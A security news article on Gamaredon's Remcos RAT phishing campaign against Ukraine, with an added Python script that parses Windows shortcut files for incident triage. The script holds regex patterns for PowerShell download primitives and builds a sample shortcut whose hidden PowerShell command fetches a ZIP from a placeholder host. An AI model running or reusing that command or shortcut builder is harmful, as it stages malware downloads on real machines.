Entities in Ukraine have been targeted by a phishing campaign designed to distribute a remote access trojan known as Remcos RAT.
“The file names use Russian words related to troops in Ukraine as a lure,” Cisco Talos researcher Guilherme Venere noted in a report published last week. “The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second-stage ZIP file containing the Remcos backdoor.”
The activity has been attributed with moderate confidence to a Russian hacking group known as Gamaredon, which is also tracked under the monikers Aqua Blizzard, Armageddon, Blue Otso, BlueAlpha, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530 and Winterflounder.
The threat actor, assessed to be affiliated with Russia's Federal Security Service (FSB), is known for targeting Ukrainian organizations for espionage and data theft. It has been active since at least 2013.
The latest campaign is characterized by the distribution of Windows shortcut (LNK) files compressed inside ZIP archives and disguised as Microsoft Office documents related to the ongoing Russo-Ukrainian war, so that recipients are tricked into opening them. The archives are believed to be delivered through phishing emails.
The attribution to Gamaredon rests on the fact that the malicious LNK files were created on two machines the threat actor had previously used for the same purpose (a shortcut file records the NetBIOS name and MAC address of the machine that created it, which is what makes this kind of pivot possible).
The LNK files embed PowerShell code that downloads and executes the next-stage payload via the Get-Command cmdlet, and also fetches the decoy document that is displayed to the victim to keep up the ruse.
The second stage is another ZIP archive containing a malicious DLL that is executed using a technique called DLL side-loading. The DLL is a loader that decrypts and runs the final Remcos payload from encrypted files shipped in the same archive.
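As an added example (not code from Cisco Talos or from the article), the following Python script shows the triage a responder would do on such a shortcut: it walks the MS-SHLLINK structure to recover the command line the LNK launches, flags the PowerShell download-and-execute pattern described above, and pulls the creating machine's NetBIOS name and MAC address out of the TrackerDataBlock, the metadata behind the attribution pivot mentioned earlier. The sample shortcut, the host address (an RFC 5737 documentation range), the machine name and the MAC address are all constructed for the demo and are not real Gamaredon indicators.

```python
"""Triage a Windows shortcut (.lnk): recover the command line it launches and the
creating-machine identifiers stored in its TrackerDataBlock.

Added example, not Cisco Talos code. The sample shortcut built below is constructed
for this demo and is not a Gamaredon artifact."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
TRACKER_SIGNATURE = 0xA0000003
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data):
    """Return the StringData fields plus the TrackerDataBlock machine details."""
    if (len(data) < LNK_HEADER_SIZE or data[:4] != struct.pack("<I", LNK_HEADER_SIZE)
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (4) covers the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    result = {"flags": flags, "tracker": None}
    for flag, name in STRING_FIELDS:             # CountCharacters (2) + string, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        result[name] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
        off += count * width
    while off + 8 <= len(data):                  # ExtraData blocks until a TerminalBlock (size < 4)
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if sig == TRACKER_SIGNATURE and size >= 0x60:
            machine_id = data[off + 16:off + 32].split(b"\x00", 1)[0].decode("ascii", "replace")
            birth_obj = data[off + 80:off + 96]  # DroidBirth object id, a version-1 GUID
            mac = None
            if birth_obj[7] >> 4 == 1:           # v1 GUID: the last 6 bytes are the node (MAC) field
                mac = ":".join("%02x" % b for b in birth_obj[10:16])
            result["tracker"] = {"machine_id": machine_id, "mac": mac}
        off += size
    return result


SUSPICIOUS = (
    (r"powershell|pwsh", "launches PowerShell"),
    (r"(?<!\w)-(?:e|en|enc|encodedcommand)\b", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-ep\b|executionpolicy", "execution policy override"),
    (r"iex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|"
     r"start-bitstransfer|get-command", "download/execute primitive"),
)


def triage(parsed):
    """Return the reasons a parsed shortcut looks like a downloader, empty if none."""
    cmdline = " ".join(v for v in (parsed.get("relative_path"), parsed.get("arguments")) if v)
    return [why for pat, why in SUSPICIOUS if re.search(pat, cmdline, re.I)]


def build_sample_lnk(target, args, machine_id, mac):
    """Build a minimal LNK (constructed test input) with RELATIVE_PATH, ARGUMENTS and a TrackerDataBlock."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (target, args))
    node = bytes.fromhex(mac.replace(":", ""))
    # Object ids are version-1 GUIDs in little-endian layout: version nibble in byte 7, node in the last 6 bytes
    obj_id = bytes.fromhex("112233445566001080aa") + node
    droid = b"\x00" * 16 + obj_id                # volume id + object id
    tracker = (struct.pack("<IIII", 0x60, TRACKER_SIGNATURE, 0x58, 0)
               + machine_id.encode()[:16].ljust(16, b"\x00") + droid + droid)
    return header + strings + tracker + struct.pack("<I", 0)   # TerminalBlock


# Constructed sample: a shortcut that points at powershell.exe and stages a download the way the
# article describes. Host (RFC 5737 documentation address), machine name and MAC are made up.
SAMPLE_TARGET = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = (r"-w hidden -ep bypass -c " + '"$d=(Get-Command Invoke-WebRequest); '
               + r"&$d 'http://203.0.113.10/update.zip' -OutFile $env:TEMP\u.zip" + '"')
SAMPLE_LNK = build_sample_lnk(SAMPLE_TARGET, SAMPLE_ARGS, "DESKTOP-7K2Q1", "00:0c:29:4a:8b:c1")


def analyse(data):
    parsed = parse_lnk(data)
    return parsed, triage(parsed)


if __name__ == "__main__":
    parsed, hits = analyse(SAMPLE_LNK)
    print("target   :", parsed.get("relative_path"))
    print("arguments:", parsed.get("arguments"))
    print("tracker  :", parsed["tracker"])
    print("verdict  :", hits or "nothing suspicious")
```

The machine name and MAC recovered from the TrackerDataBlock are what let analysts link shortcuts built on the same workstation across campaigns; the command-line heuristics are deliberately loose, since loaders of this kind resolve cmdlets indirectly (hence the `get-command` pattern) rather than spelling out `Invoke-Expression`.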
The disclosure comes as Silent Push detailed a phishing campaign that uses lure websites to collect information on Russian individuals who sympathize with Ukraine. The activity is suspected to be the work of either a Russian intelligence service or a threat actor aligned with Russia.
The campaign consists of four major phishing clusters impersonating the Central Intelligence Agency (CIA), the Russian Volunteer Corps, Legion Liberty, and “I Want to Live”, a hotline that receives appeals from Russian service members in Ukraine who wish to surrender to the Ukrainian Armed Forces.
The phishing pages were found to be hosted on the bulletproof hosting provider Nybula LLC, with the threat actors relying on Google Forms and email replies to collect personal information from victims, including their political views, bad habits and physical fitness.
“All campaigns (…) observed,” Silent Push noted. “These phishing operations are likely the work of either a Russian intelligence service or a threat actor aligned with Russian interests.”